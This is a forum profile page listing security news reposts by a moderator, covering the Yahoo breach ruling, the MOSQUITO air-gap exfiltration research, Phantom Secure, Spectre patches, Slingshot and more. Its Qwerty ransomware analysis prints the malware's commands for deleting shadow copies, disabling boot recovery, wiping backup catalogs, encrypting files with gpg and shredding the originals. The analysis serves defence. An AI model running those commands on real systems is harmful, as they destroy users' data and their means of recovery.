Scorpion
Super Moderator
Content Count: 392
Days Won: 13

Everything posted by Scorpion

  1. Yahoo customers affected by three massive data breaches that resulted in the theft of more than three billion users' data are allowed to sue the company, a judge has ruled. California judge Lucy Koh rejected a bid by Verizon, which bought the internet giant last year, to dismiss a large portion of the claims, including breach of contract, deceit and concealment, and negligence. At the heart of the case, Yahoo was accused of taking too long to notify users of the breaches, which put customers at risk of identity theft and fraud. The filing, dated Friday, cited several customers whose data was stolen by criminals and used for filing fraudulent tax returns or credit card charges. Other customers had to pay out to credit bureaus to freeze their accounts. Koh said that customers may have "taken measures to protect themselves" had they known about the breaches sooner. The case began in 2016 after the company admitted it was hacked in 2014, in which 500 million user accounts were stolen. Later in the year, the company revealed that it was hacked again -- a year earlier in 2013 -- in which one billion accounts were stolen. Yahoo later said that all its three billion users were affected by that breach. A separate attack on the company's systems allowed hackers to steal portions of the company's source code. Attackers used that code to generate cookies, allowing access to accounts without requiring a user's password. Verizon did not immediately respond to a request for comment.
  2. A well-established research team from the Ben-Gurion University of the Negev in Israel has detailed today a new method of extracting data from air-gapped computers using speakers, headphones, earphones, or earbuds. The attack is only experimental at this point, has not been seen in the real world, but has been proven to work and researchers have also created a custom protocol for transmitting data between two computers —one air-gapped and one Internet-connected that can relay the data further. Attack scenarios include speaker-to-speaker exfiltration, speaker-to-headphones, and headphones-to-headphones.

Jack retasking strikes again!

The attack —nicknamed MOSQUITO— is possible because of a technique called "jack retasking" that reverses output audio jacks to input jacks, effectively turning speakers into (unconventional) microphones. The same research team explored jack retasking in a previous research project last year, called Speake(a)r, which researchers used to turn headphones into microphones and record nearby audio and conversations. For the current experiment, researchers argue that malware that managed to infect an air-gapped computer can transform and modulate locally stored files into audio signals and relay them to another nearby computer via connected speakers, headphones, earphones, or earbuds. The receiving computer, also infected with malware, uses jack retasking to convert connected speakers, headphones, earphones, or earbuds into a makeshift microphone, receive the modulated audio, and convert it back into a data file.

MOSQUITO attack supports pretty fast transfer speeds

Researchers created a custom data protocol that modulates binary data into audio signals, and they tested their attack for distances between 1 and 9 meters (3.2 to 29.5 feet).
Researchers said they managed to transfer data between two computers with speeds varying between 1800 bits/s and 1200 bits/s for speakers facing each other and emitting sound in audible frequency bands (lower than 18kHz). Transfer speeds decreased if the speakers weren't facing each other, the distance between speakers increased, or the audio frequency changed (towards low or high frequency). While the first two factors are self-explanatory, the last needs an additional explanation. "The reason for that is that loudspeakers, and particularly home grade PC loudspeakers, were projected and optimized for human auditory characteristics, and therefore they are more responsive to the audible frequency ranges," said researchers. Transfer speeds also decreased when using earphones or earbuds (varied between 600 bits/s and 300 bits/s) and went even lower for headphones (around 250 bits/s). The reason was that headphones directed their sound waves in one particular direction, limiting efficient exfiltration cases to very small distances when headphones were close to each other, and when they emitted sound in audible frequencies only. Other factors that decreased data transfer speeds included environment noise such as music and speech, but researchers said this could be mitigated by moving the data exfiltration frequency above 18kHz. The research team discusses various mitigations and countermeasures in their research paper entitled "MOSQUITO: Covert Ultrasonic Transmissions between Two Air-Gapped Computers using Speaker-to-Speaker Communication." They also released the following demos to showcase their work.
The research center from the Ben-Gurion University of the Negev that came up with this new data exfiltration technique has a long history of innovative and sometimes weird hacks, all listed below:
- LED-it-Go - exfiltrate data from air-gapped systems via an HDD's activity LED
- SPEAKE(a)R - use headphones to record audio and spy on nearby users
- 9-1-1 DDoS - launch DDoS attacks that can cripple a US state's 911 emergency systems
- USBee - make a USB connector's data bus give out electromagnetic emissions that can be used to exfiltrate data
- AirHopper - use the local GPU card to emit electromagnetic signals to a nearby mobile phone, also used to steal data
- Fansmitter - steal data from air-gapped PCs using sounds emanated by a computer's GPU fan
- DiskFiltration - use controlled read/write HDD operations to steal data via sound waves
- BitWhisper - exfiltrate data from non-networked computers using heat emanations
- Unnamed attack - uses flatbed scanners to relay commands to malware-infested PCs or to exfiltrate data from compromised systems
- xLED - use router or switch LEDs to exfiltrate data
- Shattered Trust - using backdoored replacement parts to take over smartphones
- aIR-Jumper - use security camera infrared capabilities to steal data from air-gapped networks
- HVACKer - use HVAC systems to control malware on air-gapped systems
- MAGNETO & ODINI - steal data from Faraday cage-protected systems
  3. As Oscar Wilde might have put it: "To lose one filing cabinet full of government documents may be regarded as a misfortune; to lose two looks like carelessness." Carelessness is something the Australian government seems to be quite good at these days. News broke on Sunday that in 2013, confidential personnel files from the then Department of Families, Housing, Community Services and Indigenous Affairs (FaHCSIA), now part of the Department of Social Services, had gone walkies for several days. Just like the secret cabinet files incident reported in January, these documents were discovered in a locked filing cabinet bought from a second-hand furniture store. "The documents were personnel files which had all the personal details [of employees] like home addresses and phone numbers, as well as previous positions held, CVs, and security clearances," the buyer told The Sunday Canberra Times. "It was a two-drawer filing cabinet, and the bottom drawer was completely full," he said. The two incidents aren't quite the same. Personnel files don't have to be handled under the same security protocols as cabinet documents. But there's plenty enough information in them to make identity theft or spearphishing a trivial pursuit. Yes, this is carelessness. Then there was the incident where a "classified notebook belonging to a top Defence official" was discovered, along with his ID ... guess where? "Initial inquiries indicate the items were inadvertently left in a piece of personal furniture recently disposed of by the Defence official," The Canberra Times reported. Three incidents involving lost documents in second-hand furniture don't constitute a wave of incompetence, of course, no more than two or three robberies randomly clustered together constitute a crime wave. But these physical data leaks are being unearthed at a time when confidence in the government's ability to manage data needs to be questioned, and questioned hard.
Do we need to repeat the now-familiar litany? The government's recklessness with medical data. The omnishambles of the 2016 Census. The collapse of the Australian Taxation Office (ATO) storage system. The unthinking viciousness of Centrelink's robodebt debacle. Things are no better at the state level -- the corruption of Victoria's Ultranet project and NSW agencies struggling with the security basics, to name but two examples. Do you detect a pattern? I do. So do former senior public servants, but in another way. Last month, The Mandarin, a news site that covers leadership in the public sector, concluded that there's an urgent need to recover the capacity for deep policy analysis in the Australian Public Service (APS). Terry Moran, a former secretary of the Department of the Prime Minister and Cabinet (PM&C), was scathing. "The APS is failing in areas of social policy because it has been stripped of specialist capability and service delivery experience. If it were a patient it would be in palliative care," Moran said. "Successive governments haven't nurtured the APS: they've gutted it." David Borthwick, former secretary of the Department of Environment, Water, Heritage and the Arts, was concerned that a lack of resources meant that departments were flat out delivering their programs, with little time for anything else. "The quality of the Australian Public Service is the foundation of good government. It must have the capacity -- the skilled workforce and the resources -- to undertake the strategic thinking which underpins longer-term reforms," Borthwick said. Highly-respected journalist Laura Tingle reported similar concerns in her Quarterly Essay from 2015, Political Amnesia: how we forgot how to govern. 
"The blurring of boundaries between the public servant and the political adviser, and the relentless focus on message over substance, results in a diminution of the 'space' in which the independent adviser can operate," Martin Parkinson, currently secretary of the Department of Prime Minister and Cabinet, said at the time. "Today, in some institutions, smart people look around at their colleagues and find there is no one to talk to, to learn from, who has experience in delivering real reform." Ken Henry, a former secretary of the Commonwealth Treasury, said much the same thing in Tingle's essay. "I think many departments have lost the capacity to develop policy; but not just that, they have lost their memory. I seriously doubt there is any serious policy development going on in most government departments," Henry said. All this is about developing policy rather than implementing programs, of course. But aren't they the exact two things that the government is actually for? If Australia were struggling to do either one of them, then we'd be deep in the brown stuff. But we're struggling with both. The most worrying comment for me came from Peter Varghese, a former secretary of the Department of Foreign Affairs and Trade (DFAT). "Deep policy thinking is an area where our system, at both the political and the public service levels, has struggled over the last decade," The Mandarin quoted Varghese as saying. "Recovering the capacity for deep policy analysis is urgent because we are at an inflection point in our history. It is not dissimilar to the period after the second world war when the nation had to set out in a new direction and when the political and public service leaderships worked so well together to chart that direction. Or the period from the early eighties when we set out to internationalise the Australian economy; or the nineties when tax and industrial relations policies had to be redefined." 
Yes, the Australian government is struggling, both with policy development and with the implementation of data-enabled programs, at the exact moment in history when such things are needed. The government is even having to hire consultants to teach it how to do basic government stuff like organisational development. Parliament is currently running an inquiry into how the government uses contractors, with wide-ranging terms of reference. Stay tuned, but remember that this inquiry will only scratch the surface.

Related Coverage:
- Canberra seeks vendor fluent in digital transformation to modernise public service -- The Australian Public Service Commission is looking for a vendor to train public service staff so they can lead digital transformation within their respective agencies or departments.
- Australian Home Affairs thinks its IT is safe because it has a cybermoat -- For a department that is focused on protecting borders, it seems virtual border protection is missing in action.
- Cisco: Update now to fix critical hardcoded password bug, remote code execution flaw -- Cisco patches two serious authentication bugs and a Java deserialization flaw.
- UK government lays out new guidelines for IoT device security (TechRepublic) -- In its Secure by Design report, the UK government aims to address the risk of consumer privacy being undermined by the Internet of Things.
- Microsoft forces Windows 10 update on PCs that were set up to block it (TechRepublic) -- Some users reported being pushed to the Win10 1709 upgrade with no advanced warning.
  4. A Canadian businessman has been arrested in the US for allegedly modifying and encrypting BlackBerry smartphones used by "upper echelon" Australian criminals, Mexican drug cartel members, and other members of the global underworld. Vincent Ramos, 41, the chief executive of Vancouver-based Phantom Secure, was taken into custody in California last week after a global investigation involving the Australian Federal Police and the seizure of shipments of cocaine from the US to Australia. Phantom Secure technicians gutted BlackBerry handsets of their original hardware and software and installed new encryption software and an email program, according to a criminal complaint filed in the US District Court. Of the 20,000 Phantom Secure devices in service around the world, 10,000 were allegedly in Australia, according to estimates touted by the FBI. "According to law enforcement sources in Australia, Canada, and the US, Phantom Secure devices are used by the upper echelon members of various transnational criminal organisations to communicate with their criminal compatriots and conduct the illegal activities of the organisation," FBI Special Agent Nicholas Cheviron wrote in the complaint. Phantom Secure allegedly charged customers between $2,000 and $3,000 for six-month subscriptions, and the devices were "specifically designed to prevent law enforcement from intercepting and monitoring communication". The phones' emails were allegedly routed through encrypted servers in Panama and Hong Kong, nations Phantom Secure claimed in marketing materials were "uncooperative" with law enforcement. A transnational drug trafficker and associate of Mexico's infamous Sinaloa cartel, known in court documents as Cooperating Witness One (CW-1), told authorities cartel members used Phantom Secure phones.
"CW-1 stated that over the course of several years, his drug trafficking organisation moved hundreds of kilograms of cocaine per month from Mexico through the US, ultimately destined for Canada and Australia," the FBI special agent wrote. "CW-1 used a Phantom Secure device to co-ordinate and complete each of these drug transactions." In August 2015, using Phantom Secure devices, "CW-1 and his Australian conspirators co-ordinated a shipment of 10kg of cocaine from the US to Australia, which was seized by the Australian Border Force," according to court documents. In 2016 Australian Federal Police seized a Phantom Secure device from an Australian arrested for drug smuggling, according to the FBI. "During this period, the AFP communicated with an unknown individual in Los Angeles who packaged and shipped 16 kilograms of cocaine to Australia where it was intercepted on September 11, 2016," the FBI special agent wrote. Ramos faces racketeering conspiracy, conspiracy to distribute narcotics charges, and aiding and abetting charges. The arrest of the head of an organisation helping criminals avoid legal surveillance will, more than likely, be used by those seeking a decryption magic bullet. Last month, Australian Minister for Home Affairs Peter Dutton labelled "ubiquitous encryption" a "significant obstacle" to terrorism investigations. According to the minister, more than 90 percent of counter-terrorism targets are using encryption for communications, including for attack planning in Australia. "Decryption takes time, a precious commodity when threats may materialise in a matter of days or even hours," Dutton said at the time. "Law enforcement access to encrypted communications should be on the same basis as telephone and other intercepts, in which companies provide vital and willing assistance in response to court orders." 
Speaking at a recent Senate Estimates hearing, Secretary of the Department of Home Affairs Michael Pezzullo said the government's decryption solution, when details on it are unveiled, would not "undermine legitimate encryption" and would balance societal needs for encryption. "The challenge for governments and parliaments all around the world is how do you ensure that encryption is used for legitimate societal purposes, and not misused by -- in the same way the internet is misused through the dark web -- that encryption is available to those who use it for legitimate purposes and not otherwise," Pezzullo said last month. The secretary for Home Affairs struck out at descriptions of the decryption proposal as a "backdoor". "That's the shorthand, colloquial, and in many respects, highly ill-informed shorthand that is sometimes used in this field," he said. "You assume that a backdoor has to be created, I'm just saying that that is a cartoon-like assumption -- not that you are making -- but you've seen the literature." Later in the hearing, the department said the national facial recognition system it is developing was protected due to its "hub-and-spoke" topology, and a unique characteristic of its network. "We've also got a moat on the outside of the gateway, don't we?" Pezzullo said to Department Deputy Secretary of Intelligence and Capability Maria Fernandez. After Fernandez replied in the affirmative, Pezzullo said the system also has a number of "forward posts ahead of the moat". Details on the department's cybermoat have yet to be fleshed out. In November, Ben Flatgard, director for Cybersecurity Policy on the US National Security Council during the Obama administration, told ZDNet that Australia's push for decryption was reckless policy. "We've been discussing this as long as encryption's been used in commercial applications," Flatgard said.
In January, a US senator said the approach to encryption by FBI director Christopher Wray was an ill-informed policy proposal. "For years, these experts have repeatedly stated that what you are asking for is not, in fact, possible," said Democrat Senator Ron Wyden in a letter. Wray had previously stated that an inability to access encrypted devices was an urgent public safety issue, and the agency was not able to access evidence, despite lawfully being able to.
  5. Just two botnets accounted for 97% of all spam emails in the last three months of 2017, according to a McAfee report released earlier today. For most of these months, Necurs has spent its time churning out "lonely girl" spam lures for adult websites, pump-and-dump schemes [1, 2], and delivering ransomware payloads. Overall, nearly two out of three spam emails sent in the last quarter of 2018 were sent from the infrastructure of this mammoth botnet. Second on the list was the Gamut botnet, also built on Windows machines infected with malware that hijacks systems to send out spam. Gamut —while smaller in size when compared to Necurs— had previously been more active in Q3, sending more spam than the aforementioned. In Q4, Gamut activity went down, but the botnet still accounted for 37% of all email spam, compared to Necurs' 60%. Most of Gamut's email subjects were related to job offer–themed phishing and money mule recruitment (tricking people to buy products with stolen money and sending the products to crooks; relaying money from hijacked bank accounts to crooks' accounts).

Ransomware statistics for Q4 2017

But the report, which takes an eagle-eye view of the malware scene in Q4 2017, also shines a light on the ransomware scene. McAfee says that the numbers of both desktop and mobile ransomware were up in late 2017, by 35% in Q4 and by 59% for the year. On the desktop side, the security firm says that a big contributor to the growth of ransomware detections was the Ransom:Win32/Genasom family, a generic term that has been used for CryptoMix variants. On the mobile scene, the number of new mobile ransomware families went down, but the number of infections continued to grow. But this part of the McAfee report is questionable, as another similar report from ESET said that mobile ransomware went down, not up, in 2017.
Other malware statistics for Q4 2017

As for other malware trends, the McAfee Labs Threats Report for Q4 2018 contains the following findings:
- The number of new malware strains grew by 35%
- The total number of malware detections grew by 35%
- Waboot malware was the most detected threat of Q4 2017
- Mac malware grew by 24% in Q4 and 243% for the year
- Flashback (infostealer) and Longage (RAT) were the most prevalent Mac threats in Q4 2017
- JavaScript-based malware grew by 9%
- PowerShell malware more than tripled, growing by 267%
- Macro malware increased by 53% in Q4, declined by 35% in 2017
- Faceliker malware continued to grow after initial detection
  6. Intel has almost wrapped up revised microcode updates that address unexpected reboots caused by its first attempt at mitigating the Spectre variant 2 attack. The chip-maker's recently updated microcode revision guidance indicates that most of its platforms from the past decade now have production-ready patches to mitigate the Spectre attack. On January 22, three weeks after releasing microcode updates to address the speculative execution side-channel vulnerabilities, Intel advised PC makers to halt the deployment of its Spectre patches due to unexpected system reboots and in some instances data loss. Over the past month Intel has released revised updates for Skylake, Kaby Lake, Coffee Lake chips and, at the end of February, released fixed production updates for Broadwell and Haswell chips. As of Thursday, Intel has moved beta updates for Sandy Bridge and Ivy Bridge processors to production. These include Xeon and Core processors for the two families. It also released revised production updates for Haswell Server EX Xeon, Haswell ULT, and Broadwell Server EX Xeon CPUs. The revised microcode updates are delivered to end-users as firmware updates from PC and server manufacturers. Dell has now released new BIOS updates with Intel's revised microcode for datacenter servers and PowerEdge Server 14G, 13G, and 12G generation servers, with 11G updates still in process. Dell has also released revised BIOS updates available for most of its client devices across XPS, Vostro, Venue, Precision, OptiPlex, Latitude, Inspiron, and Alienware brands. HP's support page indicates that most of its commercial and consumer laptops, desktops and tablets have fixed softpaq updates available for download. Lenovo meanwhile expects to update ThinkCenter, ThinkPad, ThinkStation, and Yoga by the end of March. Updates for affected Lenovo enterprise systems are also targeted for delivery throughout March.
Admins managing large Windows deployments can use Microsoft's recently released Spectre and Meltdown patch assessment tool to check the status of devices on their networks.

Previous and related coverage:
- New Spectre attack variant can pry secrets from Intel's SGX protected enclaves -- Sensitive data protected by Intel's Software Guard Extensions could be open to a new side-channel attack.
- Intel's Spectre fix for Broadwell and Haswell chips has finally landed -- Chips that sparked Intel's recall of microcode for Spectre Variant 2 attack now have stable fixes.
- First Intel, now AMD also faces multiple class-action suits over Spectre attacks -- Customers accuse the chip maker of charging premium prices for a faulty product.
- Intel's new Spectre fix: Skylake, Kaby Lake, Coffee Lake chips get stable microcode -- Intel makes progress on reissuing stable microcode updates against the Spectre attack.
- Meltdown-Spectre: Now the class action suits against Intel are starting to mount up -- Intel faces 32 class action lawsuits over its processor flaws and says more may be in the pipeline.
- Meltdown-Spectre flaws: We've found new attack variants, say researchers -- Intel and AMD may need to revisit their microcode fixes for Meltdown and Spectre.
- Linux Meltdown patch: 'Up to 800 percent CPU overhead', Netflix tests show -- The performance impact of Meltdown patches makes it essential to move systems to Linux 4.14.
- Spectre reboot problems: Now Intel replaces its buggy fix for Skylake PCs -- And offers patching tips from US CERT, which it failed to brief on the bugs.
- Meltdown-Spectre: Malware is already being tested by attackers -- Malware makers are experimenting with malware that exploits the Spectre and Meltdown CPU bugs.
- Windows emergency patch: Microsoft's new update kills off Intel's Spectre fix -- The out-of-band update disabled Intel's mitigation for the Spectre Variant 2 attack, which Microsoft says can cause data loss on top of unexpected reboots.
- Meltdown-Spectre: Why were flaws kept secret from industry, demand lawmakers -- Great work on patching your own products, but why were smaller tech companies kept in the dark?
- Spectre flaw: Dell and HP pull Intel's buggy patch, new BIOS updates coming -- Dell and HP have pulled Intel's firmware patches for the Spectre attack.
- Windows 10 Meltdown-Spectre patch: New updates bring fix for unbootable AMD PCs -- AMD PCs can now install Microsoft's Windows update with fixes for Meltdown and Spectre and the bug that caused boot problems.
- Meltdown-Spectre: Intel says newer chips also hit by unwanted reboots after patch -- Intel's firmware fix for Spectre is also causing higher reboots on Kaby Lake and Skylake CPUs.
- 26% of organizations haven't yet received Windows Meltdown and Spectre patches (TechRepublic) -- Roughly a week after the update was released, many machines still lack the fix for the critical CPU vulnerabilities.
- Bad news: A Spectre-like flaw will probably happen again (CNET) -- Our devices may never truly be secure, says the CEO of the company that designs the heart of most mobile chips.
  7. A sharp rise in cyber attacks targeting hospitals has been assisted by a failure by healthcare to address known vulnerabilities or comply with best security practices, with password sharing, outdated software and exposed servers rife within the sector. This lax approach to cyber security means that many cyber attackers and hackers are happy to take advantage of what they view as an easy target in order to get their hands on sensitive information - including medical records and other sensitive personal data. According to figures in the McAfee Labs Threats Report for March 2018, 2017 saw a 211 percent increase in disclosed security incidents in the healthcare sector compared with 2016. According to researchers at the security company, many of these incidents were "caused by failures to comply with security best practices or to address vulnerabilities in medical software". That compares to a rise in reported cyber attacks against educational establishments of 125 percent and a jump of around 15 percent in reported incidents against the financial and public sectors. While some cyber attackers view targeting hospitals as a step too far when it comes to conducting campaigns, for others they're lucrative hubs of valuable data just waiting to be exploited. During the course of the research, researchers found exposed healthcare data, sensitive images and vulnerable software, resulting in the ability to reconstruct patient body parts with the use of 3D printing. Typical security holes in healthcare organisations include hardcoded, embedded passwords, remote code execution, unsigned firmware or failures to address known vulnerabilities in medical software. Default accounts, cross-site scripting and vulnerabilities in web servers were also found to be issues, with many systems found to be running on old software.
Arguably, the most significant example of failure to apply security patches resulting in hospitals falling victim to cyber attacks came with last year's WannaCry ransomware outbreak. While no patient data was compromised as a result of this global cyber attack, a large number of National Health Service hospitals and doctor's surgeries in the UK were forced offline as systems became infected. Later analysis of the incident found that basic patching could have prevented WannaCry from having such a massive impact. But the rise in attacks against healthcare, combined with the sensitive personal data they hold, and how a cyber attack against a hospital could result in harm to patients, means organisations in the sector - and those which provide technology to them - must take more care when it comes to cyber security. "Both healthcare organisations and developers creating software for their use must be more vigilant in ensuring they are up to date on security best practices," said Christiaan Beek, McAfee lead scientist and senior principal engineer.
  8. Asia-Pacific had to deal with the highest number of malicious mobile apps last year and also was the region most affected across multiple categories, including ransomware and online banking malware. Some 3.3 million malicious mobile apps were detected in the region--five times more than EMEA, which was the next most affected region with 617,290 identified malicious apps. Asia-Pacific also clocked the highest number of threats in ransomware, accounting for 40 percent of the global figure, according to Trend Micro's 2017 annual security roundup report. In addition, the region saw the highest number of exploit kit attacks, at 70 percent, and had the highest number of PCs infected by online banking malware, at 55 percent. Last year, 553 data breaches were reported publicly, compared to 813 in 2016, noted Trend Micro's Asia, Middle East, and Africa managing director, Dhanya Thakkar. However, the number of affected records hit almost 5 billion, compared to 3.3 billion in 2016. "Ransomware threats and exploit kits also decreased in 2017, signalling a shift away from spray-and-pray attacks, and towards smaller-scale, more effective, and more targeted attacks," Thakkar said. Globally, there were 1.7 billion ransomware threats over the last two years, resulting in an estimated loss of US$5 billion. Asia-Pacific was hit by almost 40 percent of such attacks. Some 630 million threats were detected in 2017 alone, down from 1.07 billion the year before. Trend Micro also pointed to "soaring rates" of cryptocurrency mining malware, which exceeded 100,000 in October last year. More than 45.6 million cryptocurrency mining activities were identified across the year, accounting for a large proportion of events detected on Internet of Things (IoT) devices. The number of Business Email Compromise attempts also doubled between the first and second half of the year.

Singapore issues cautionary note on mobile banking

Meanwhile, Singapore's banking regulator and cybersecurity government agency issued a joint statement advising consumers to exercise caution when conducting mobile banking transactions. "Cybercriminals are targeting mobile banking users to phish for their personal data, login credentials to online services, and credit card information. These threats come in different forms, such as the installation of malware on mobile devices, the sniffing of data over unsecured Wi-Fi networks, or phishing scams masquerading as official correspondence from financial institutions," they said. The statement listed recommended steps consumers should take when banking on their mobile devices, which included accessing only trusted sources, avoiding unsecured Wi-Fi networks when banking online, and enabling two-factor authentication.
  9. Researchers at Kaspersky Lab have discovered espionage malware that appears to have been developed by a government to spy on targets across Africa and the Middle East for the past six years. The researchers haven't named Slingshot's country of origin but note the presence of debug messages written in perfect English, while various component names such as Gollum and Smeagol suggest the authors are fans of The Hobbit.

Slingshot reached targets from a compromised software update for routers made by Latvian firm MikroTik. Its router management software, WinBox, downloads DLLs from the router's file system and loads them directly into a computer's memory, an intended feature that Slingshot's developers exploited by adding a malicious library called ipv4.dll, which downloads the espionage tools.

The two tools, Cahnadr and GollumApp, work in tandem to gather information and hide data collection and exfiltration from the target. Kaspersky researchers found it can capture screenshots, keyboard data, network data, passwords, USB connections, other desktop activity, and clipboard data.

The researchers haven't discovered how Slingshot infects MikroTik routers to use the WinBox bridge to the PC; however, they note in a technical paper that WikiLeaks' Vault 7 leak of CIA hacking tools did reference an exploit for MikroTik's router OS called ChimayRed. According to MikroTik, the latest versions of WinBox no longer download the ipv4.dll file from the router, closing the attack vector.

The malware appears to have been narrowly used, with Kaspersky counting just 100 detections among its users between 2012 and February 2018. Over half the compromised computers were in Kenya and Yemen, with the remainder in Libya, Afghanistan, Iraq, Tanzania, Greece, Jordan, Mauritius, Somalia, Tunisia, Turkey, and the United Arab Emirates.

Slingshot hasn't been observed using previously undisclosed flaws, but it did use three known vulnerabilities affecting non-Microsoft Windows utilities to load a kernel-mode component of Cahnadr. According to Kaspersky's FAQ on Slingshot, the GollumApp module features nearly 1,500 functions.

"To run its code in kernel mode in the most recent versions of operating systems, that have Driver Signature Enforcement, Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities.

"Following infection, Slingshot would load a number of modules onto the victim device, including two huge and powerful ones: Cahnadr, the kernel mode module, and GollumApp, a user mode module. The two modules are connected and able to support each other in information gathering, persistence and data exfiltration.

"The most sophisticated module is GollumApp. This contains nearly 1,500 user-code functions and provides most of the above described routines for persistence, file system control and C&C communications."

Kaspersky advised anyone who uses MikroTik routers to update to its latest software release. Also, the company says MikroTik's WinBox software no longer allows downloading files from the router to the computer.
  11. Starting with Firefox 60, expected to be released in May 2018, websites won't be able to use Firefox to access data from sensors that provide proximity distances and ambient light information. Firefox was allowing websites to access this data via the W3C Proximity and Ambient Light APIs. But at the start of the month, Mozilla engineers decided to disable access to these two APIs by default.

The APIs won't be removed, but their status is now controlled by two Firefox flags that will ship disabled by default. This means users will have to manually enable the two flags before any website can use Firefox to extract proximity and ambient light data from the device's underlying sensors.

A total of five new flags added

The two flags will be available in Firefox's about:config settings page. The screenshot below shows the latest Firefox Nightly version, where the two flags are now disabled, while other sensor APIs are enabled.

    device.sensors.proximity.enabled
    device.sensors.ambientLight.enabled

The Firefox code commit in which these two flags have been added also includes three other flags: to enable or disable all sensors APIs, to enable/disable the Device Orientation Sensor API, and to enable/disable the Motion Sensor API.

    device.sensors.enabled
    device.sensors.orientation.enabled
    device.sensors.motion.enabled

These three flags will ship enabled by default, as access to these two APIs is needed by a wide range of mobile websites.

Privacy concerns over the Proximity and Ambient Light APIs

The Proximity and Ambient Light sensors are both new and highly controversial. A key factor in the decision to ship these two APIs disabled by default is the work of privacy expert Lukasz Olejnik. Olejnik published two research reports on the possible ways attackers and advertisers could abuse these two APIs.

For example, Olejnik argued that the W3C Proximity Sensor API could allow websites and advertisers to query the position of nearby objects in relation to a user's smartphone or tablet. Additionally, he also argued that malicious sites could use the W3C Ambient Light Sensor API to steal browser data. Shipping these two APIs off by default takes care of some of Olejnik's concerns, although it does not mitigate the risk altogether. "More user control is always good," Olejnik said regarding Mozilla's decision.
  12. A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program to encrypt a victim's files. Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victim's files, overwrite the originals, and then append the .qwerty extension to an encrypted file's name. It goes without saying that GnuPG is a legitimate program being illegally used by the Qwerty Ransomware developers. While a ransomware using GnuPG to encrypt files is not unique, as it has been done in the past with VaultCrypt and KeyBTC, it is not something that is commonly seen.

While it is not known for sure how this ransomware is being distributed, it appears likely that it is manually installed by the attacker when they hack into computers running Remote Desktop Services. First discovered by MalwareHunterTeam, we did not have the full package in order to fully analyze it. This week MalwareHunterTeam was able to find the complete package hosted on a site so that we could analyze it further.

How the Qwerty Ransomware encrypts a computer

The Qwerty Ransomware consists of a package of individual files that are run together to encrypt a computer. This package consists of the GnuPG gpg.exe executable, the gnuwin32 shred.exe file, a batch file that loads the keys and launches a JS file, and a JS file that is used to launch the find.exe program.

(Image: Qwerty Ransomware Package)

The first file to be launched is the key.bat file. This file acts as the main launcher for the ransomware by executing various commands sequentially.

(Image: Batch File)

When the batch file is executed, the keys will be imported as shown below.

(Image: Importing Keys)

After the keys are imported, the batch file will launch run.js. This file will execute the find.exe program, which is the main ransomware component. When executing find.exe, it will specify a particular drive letter that it tries to encrypt.

(Image: JavaScript File)

When find.exe is executed it will launch the following commands on the victim's computer.

    taskkill /F /IM sql /T
    taskkill /F /IM chrome.exe /T
    taskkill /F /IM ie.exe /T
    taskkill /F /IM firefox.exe /T
    taskkill /F /IM opera.exe /T
    taskkill /F /IM safari.exe /T
    taskkill /F /IM taskmgr.exe /T
    taskkill /F /IM 1c /T
    vssadmin.exe delete shadows /all /quiet
    wmic shadowcopy delete
    bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
    bcdedit.exe bcdedit /set {default} recoveryenabled no
    wbadmin.exe wbadmin delete catalog -quiet
    del /Q /F /S %s$recycle.bin

It will then begin to encrypt each drive on the computer by executing the following command when it encrypts a file:

    gpg.exe --recipient qwerty -o "%s%s.%d.qwerty" --encrypt "%s%s"

This command will encrypt the file using the imported public key and then save it as a new file under the same name, but now with the .qwerty extension appended to it. For example, test.jpg would be encrypted and saved as test.jpg.qwerty.

(Image: Encrypted Qwerty Files)

When encrypting files, it will encrypt any file that does not contain the following strings:

    Recycle
    temp
    Temp
    TEMP
    windows
    Windows
    WINDOWS
    Program Files
    PROGRAM FILES
    ProgramData
    gnupg
    .qwerty
    README_DECRYPT.txt
    .exe
    .dll

After it encrypts a file it will run the shred.exe file on the original file in order to overwrite it.

    shred -f -u -n 1 "%s%s"

It should be noted that it only overwrites files once, so they may be recoverable with file recovery software. The use of only one wipe is a tradeoff between speed and securely deleting the file.

In each folder in which a file is encrypted, it will create a ransom note named README_DECRYPT.txt which contains instructions to contact cryz1@protonmail.com to receive payment instructions.

(Image: Qwerty Ransom Note)

Unfortunately, this ransomware is secure and there is no way to decrypt files for free as only the attacker has possession of the private decryption key. Due to the components used to encrypt the computer, the process is very slow, so it may be possible to spot the ransomware in action and shut down the computer before it encrypts too many files.

How to protect yourself from the Qwerty Ransomware

In order to protect yourself from ransomware in general, it is important that you use good computing habits and security software. First and foremost, you should always have a reliable and tested backup of your data that can be restored in the case of an emergency, such as a ransomware attack.

As Qwerty appears to be installed via hacked Remote Desktop services, it is very important to make sure it's locked down correctly. This includes making sure that no computers running remote desktop services are connected directly to the Internet. Instead, place computers running remote desktop behind VPNs so that they are only accessible to those who have VPN accounts on your network. It is also important to set up proper account lockout policies so that it is difficult for accounts to be brute forced over Remote Desktop Services.

You should also have security software that incorporates behavioral detections to combat ransomware and not just signature detections or heuristics. For example, Emsisoft Anti-Malware and Malwarebytes Anti-Malware both contain behavioral detection that can prevent many, if not most, ransomware infections from encrypting a computer.

Last, but not least, make sure you practice the following security habits, which in many cases are the most important steps of all:

- Backup, Backup, Backup!
- Do not open attachments if you do not know who sent them.
- Do not open attachments until you confirm that the person actually sent them to you.
- Scan attachments with tools like VirusTotal.
- Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated.
- Make sure you have some sort of security software installed that uses behavioral detections or white list technology. White listing can be a pain to train, but if you're willing to stick with it, it could have the biggest payoffs.
- Use hard passwords and never reuse the same password at multiple sites.

For a complete guide on ransomware protection, you can visit our How to Protect and Harden a Computer against Ransomware article.

IOCs

Hashes:

    find.exe: 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9ae558a41841e502
    gpg.exe: 2b605abf796481bed850f35d007dad24
    iconv.dll: aa9ec502e20b927d236e19036b40a5da5ddd4ae030553a6608f821becd646efb
    key.bat: 554c6198a015dc87e394c4fc74bf5040c48829d793e302632f9eec663733a09e
    libiconv2.dll: 3ec2d1a924ef6f19f2db45e48b9cf4b74a904af5720100e3da02182eee3bcf02
    libintl3.dll: b92377f1ecb1288467e81abe286d1fd12946d017e74bd1ab5fb2f11e46955154
